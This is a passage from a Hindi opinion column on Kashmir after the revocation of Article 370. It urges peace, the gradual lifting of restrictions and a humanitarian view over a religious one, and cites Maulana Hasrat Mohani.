अगर ऐसा नहीं होता तो जैसे पूरवर्ती सरकारों ने इसे आसानी से खोखला किया है इस बार भी किया जा सकता था लेकिन उससे सियासी रोटी नहीं सिक पाती अब इसे मजहबी रंग से भी दिखाया जा रहा है जो उचित नहीं है।
कुल मिलाकर कश्मीर के लोगों को इसे समझना चाहिए और शांति की स्थापना के लिए प्रयास करने चाहिए क्योंकि जिधर वह देख रहे हैं वहां सिर्फ छलावा है कट्टरपंथी और अलगावादियों की सोच से बाहर आकर नई सुबह के लिए कोशिश करनी चाहिए क्योंकि कश्मीर को वापिस जन्नत बनाने की ज़िम्मेदारी भी हमारी है लिहाज़ा यह अमन के बगैर नहीं हो सकता चीज़ों को मजहब के चश्मे से न देखते हुए मानवता की नजर से देखा जाना चाहिए भूख ,बीमारी से मरते लोग हमारे हैं भारत के लाल है हमें इन्हें बचाना होगा ।
सरकार को भी इस काम के लिए समाजसेवी संस्थाओं की मदद लेनी चाहिए प्रतिबंध धीरे धीरे समाप्त किए जाने चाहिए ताकि लोगों में विश्वास बहाल हो दरअसल आज जो हो रहा है उसी की भविष्यवाणी मौलाना हसरत मोहानी ने की थी इन्हीं हालात को देश में पनपते हसरत तब देख रहे थे आइए अब हसरत को समझने की कोशिश दुबारा करे तो समस्या को सुलझाने का हल मिल सकता है। कश्मीरियों ने 370 को भावनात्मक मुद्दा बना दिया है जबकि यह राजनीति का विषय है और इसे शांति से हल किया जाना चाहिए।खैर यूं समझिए यह है किस्सा सियासत का जिसमें जन्नत में फाके हैं।

LEAVE A REPLY

Please enter your comment!
Please enter your name here